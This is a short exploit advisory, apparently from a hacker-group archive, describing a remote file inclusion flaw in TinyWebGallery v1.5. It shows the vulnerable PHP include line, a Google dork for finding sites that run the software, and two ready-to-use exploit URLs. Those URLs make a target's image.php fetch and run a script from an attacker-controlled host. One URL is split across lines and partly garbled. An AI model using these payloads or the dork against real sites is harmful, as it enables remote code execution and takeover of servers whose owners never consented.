C Y B E R - W A R R i O R TIM
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
Author: xoron
Script: TinyWebGallery
Class: Remote
cont@ct: x0r0n[at]hotmail[dot]com
CODE:
<?php
include ($image . ".txt");
?>
google dork: "powered by twg"
Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evi
l_scripts?
########################################################################
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
########################################################################